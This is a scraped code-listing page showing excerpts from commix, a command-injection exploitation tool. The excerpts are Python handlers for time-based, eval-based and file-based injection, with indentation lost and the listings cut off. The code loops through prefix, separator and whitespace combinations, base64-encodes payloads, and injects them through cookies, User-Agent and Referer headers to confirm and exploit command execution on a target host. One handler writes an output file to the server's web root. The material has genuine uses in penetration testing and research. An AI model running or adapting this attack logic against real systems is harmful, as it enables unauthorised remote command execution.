elif settings.CUSTOM_HEADER_INJECTION:
how_long = custom_header_injection_test(url, vuln_parameter, payload)
else:
how_long = examine_requests(payload, vuln_parameter, http_request_method, url, delay, url_time_response)
if (how_long >= settings.FOUND_HOW_LONG) and (how_long - delay >= settings.FOUND_DIFF):
found_chars = True
break
if found_chars == True :
num_of_chars = output_length + 1
check_start = 0
check_end = 0
check_start = time.time()
output = []
percent = 0
for num_of_chars in range(1, int(num_of_chars)):
for ascii_char in range(1, 3):
# Get the execution ouput, of shell execution.
if alter_shell:
payload = tfb_payloads.fp_result_alter_shell(separator, OUTPUT_TEXTFILE, num_of_chars, ascii_char, delay, http_request_method)
else:
payload = tfb_payloads.fp_result(separator, OUTPUT_TEXTFILE, ascii_char, delay, http_request_method)
# Fix prefixes / suffixes
payload = parameters.prefixes(payload, prefix)
payload = parameters.suffixes(payload, suffix)
# Whitespace fixation
payload = re.sub(" ", whitespace, payload)
if settings.TAMPER_SCRIPTS['base64encode']:
payload = base64.b64encode(payload)
# Check if defined "--verbose" option.
if settings.VERBOSITY_LEVEL >= 1:
payload_msg = payload.replace("\n", "\\n")
sys.stdout.write("\n" + settings.print_payload(payload_msg))
# Check if defined cookie with "INJECT_HERE" tag
if menu.options.cookie and settings.INJECT_TAG in menu.options.cookie:
how_long = cookie_injection_test(url, vuln_parameter, payload)
# Check if defined user-agent with "INJECT_HERE" tag
elif menu.options.agent and settings.INJECT_TAG in menu.options.agent:
how_long = user_agent_injection_test(url, vuln_parameter, payload)
# Check if defined referer with "INJECT_HERE" tag
elif menu.options.referer and settings.INJECT_TAG in menu.options.referer:
how_long = referer_injection_test(url, vuln_parameter, payload)
# Check if defined custom header with "INJECT_HERE" tag
elif settings.CUSTOM_HEADER_INJECTION:
#.........这里部分代码省略.........
开发者ID:BMaChina,项目名称:commix,代码行数:101,代码来源:tfb_injector.py
示例13: eb_injection_handler
def eb_injection_handler(url, delay, filename, http_request_method):
# Driver for the "eval-based code injection technique" check. For every
# combination of whitespace, prefix, suffix and separator taken from settings it
# builds a decision payload, post-processes it (prefix/suffix, whitespace,
# optional base64 tamper) and hands it to one of eb_injector's
# cookie / User-Agent / Referer test helpers.
# In the part shown here, delay and filename are only forwarded to
# cb_handler.exploitation.
# NOTE(review): this listing has lost its indentation and is truncated after the
# Referer branch, so any statement about nesting below is inferred from
# statement order; confirm against eb_handler.py.
# Bookkeeping values; none of these four is read in the visible part.
counter = 1
vp_flag = True
no_result = True
export_injection_info = False
injection_type = "Results-based Command Injection"
technique = "eval-based code injection technique"
# Wrap every configured execution function as "${<name>(" and add the wrapped
# names to the list of eval prefixes.
# NOTE(review): this rewrites settings.EXECUTION_FUNCTIONS in place and grows
# settings.EVAL_PREFIXES; if the handler can run twice in one process the entries
# would be wrapped and appended a second time. Verify against the callers.
for item in range(0, len(settings.EXECUTION_FUNCTIONS)):
settings.EXECUTION_FUNCTIONS[item] = "${" + settings.EXECUTION_FUNCTIONS[item] + "("
settings.EVAL_PREFIXES = settings.EVAL_PREFIXES + settings.EXECUTION_FUNCTIONS
# warning_detection returns the url that is used from here on.
url = eb_injector.warning_detection(url, http_request_method)
# Progress message, skipped when a stored session is being loaded.
if not settings.LOAD_SESSION:
info_msg = "Testing the " + technique + "... "
sys.stdout.write(settings.print_info_msg(info_msg))
sys.stdout.flush()
# i counts the combinations tried so far; total is the size of the search space.
i = 0
# Calculate all possible combinations
total = len(settings.WHITESPACE) * len(settings.EVAL_PREFIXES) * len(settings.EVAL_SEPARATORS) * len(settings.EVAL_SUFFIXES)
for whitespace in settings.WHITESPACE:
for prefix in settings.EVAL_PREFIXES:
for suffix in settings.EVAL_SUFFIXES:
for separator in settings.EVAL_SEPARATORS:
# If a previous session is available.
# The stored injection point replaces the local state (including the loop
# variables separator, prefix and suffix), then the stored payload is checked
# for tamper scripts.
if settings.LOAD_SESSION and session_handler.notification(url, technique):
url, technique, injection_type, separator, shell, vuln_parameter, prefix, suffix, TAG, alter_shell, payload, http_request_method, url_time_response, delay, how_long, output_length, is_vulnerable = session_handler.injection_point_exportation(url, http_request_method)
checks.check_for_stored_tamper(payload)
# When a retest was requested, clear the flag and hand over to the classic
# technique's handler.
if settings.RETEST == True:
settings.RETEST = False
from src.core.injections.results_based.techniques.classic import cb_handler
cb_handler.exploitation(url, delay, filename, http_request_method)
# Fresh test (no stored session): build a new decision payload.
if not settings.LOAD_SESSION:
i = i + 1
# Check for bad combination of prefix and separator
# NOTE(review): prefix is the variable of an outer loop; if the loops are nested
# as listed, the emptied prefix also applies to the remaining suffix/separator
# iterations for this prefix. Confirm that is intended.
combination = prefix + separator
if combination in settings.JUNK_COMBINATION:
prefix = ""
# Change TAG on every request to prevent false-positive results.
# TAG is six random uppercase ASCII letters.
TAG = ''.join(random.choice(string.ascii_uppercase) for i in range(6))
# Two random operands below 100 and their sum; the sum is not used in the
# visible part, presumably it is what the response is later compared against
# (TODO confirm).
randv1 = random.randrange(100)
randv2 = random.randrange(100)
randvcalc = randv1 + randv2
# Define alter shell
alter_shell = menu.options.alter_shell
try:
if alter_shell:
# Classic -alter shell- decision payload (check if host is vulnerable).
payload = eb_payloads.decision_alter_shell(separator, TAG, randv1, randv2)
else:
# Classic decision payload (check if host is vulnerable).
payload = eb_payloads.decision(separator, TAG, randv1, randv2)
# NOTE(review): suffix comes from an outer loop and is URL-quoted again on each
# pass through here; a suffix containing characters that need quoting would have
# its "%" quoted once more on the next separator iteration. Verify.
suffix = urllib.quote(suffix)
# Fix prefixes / suffixes
payload = parameters.prefixes(payload, prefix)
payload = parameters.suffixes(payload, suffix)
# Fixation for specific payload.
# Drops the URL-encoded ";" ("%3B") that sits between ")" and the quoted ")}".
if ")%3B" + urllib.quote(")}") in payload:
payload = payload.replace(")%3B" + urllib.quote(")}"), ")" + urllib.quote(")}"))
# Append the per-request marker to the payload (the trailing "" adds nothing).
payload = payload + TAG + ""
# Whitespace fixation
# Every literal space becomes the current whitespace variant.
payload = re.sub(" ", whitespace, payload)
# With the base64encode tamper script enabled the payload is base64-encoded;
# otherwise any remaining spaces are URL-encoded as %20.
if settings.TAMPER_SCRIPTS['base64encode']:
from src.core.tamper import base64encode
payload = base64encode.encode(payload)
else:
payload = re.sub(" ", "%20", payload)
# Check if defined "--verbose" option.
if settings.VERBOSITY_LEVEL >= 1:
sys.stdout.write("\n" + settings.print_payload(payload))
# Channel selection. The payload can be carried in the Cookie, User-Agent or
# Referer header, so on the defending side header values need the same input
# validation and request logging as URL and body parameters.
# Cookie Injection
if settings.COOKIE_INJECTION == True:
# Check if target host is vulnerable to cookie injection.
vuln_parameter = parameters.specify_cookie_parameter(menu.options.cookie)
response = eb_injector.cookie_injection_test(url, vuln_parameter, payload)
# User-Agent Injection
elif settings.USER_AGENT_INJECTION == True:
# Check if target host is vulnerable to user-agent injection.
vuln_parameter = parameters.specify_user_agent_parameter(menu.options.agent)
response = eb_injector.user_agent_injection_test(url, vuln_parameter, payload)
# Referer Injection
# The body of this branch is not part of the listing.
elif settings.REFERER_INJECTION == True:
#.........这里部分代码省略.........
开发者ID:HugoDelval,项目名称:commix,代码行数:101,代码来源:eb_handler.py
示例14: fb_injection_handler
#.........这里部分代码省略.........
if not settings.LOAD_SESSION:
i = i + 1
# Change TAG on every request to prevent false-positive results.
TAG = ''.join(random.choice(string.ascii_uppercase) for i in range(6))
# The output file for file-based injection technique.
OUTPUT_TEXTFILE = TAG + ".txt"
# Check for bad combination of prefix and separator
combination = prefix + separator
if combination in settings.JUNK_COMBINATION:
prefix = ""
try:
# File-based decision payload (check if host is vulnerable).
if alter_shell :
payload = fb_payloads.decision_alter_shell(separator, TAG, OUTPUT_TEXTFILE)
else:
payload = fb_payloads.decision(separator, TAG, OUTPUT_TEXTFILE)
# Check if defined "--prefix" option.
# Fix prefixes / suffixes
payload = parameters.prefixes(payload, prefix)
payload = parameters.suffixes(payload, suffix)
if menu.options.base64:
payload = base64.b64encode(payload)
# Check if defined "--verbose" option.
if menu.options.verbose:
info_msg = "Trying to upload the '" + OUTPUT_TEXTFILE
info_msg += "' file on '" + settings.SRV_ROOT_DIR + "'..."
print settings.print_info_msg(info_msg)
payload_msg = payload.replace("\n", "\\n")
print settings.print_payload(payload_msg)
# Cookie Injection
if settings.COOKIE_INJECTION == True:
# Check if target host is vulnerable to cookie injection.
vuln_parameter = parameters.specify_cookie_parameter(menu.options.cookie)
response = fb_injector.cookie_injection_test(url, vuln_parameter, payload)
# User-Agent Injection
elif settings.USER_AGENT_INJECTION == True:
# Check if target host is vulne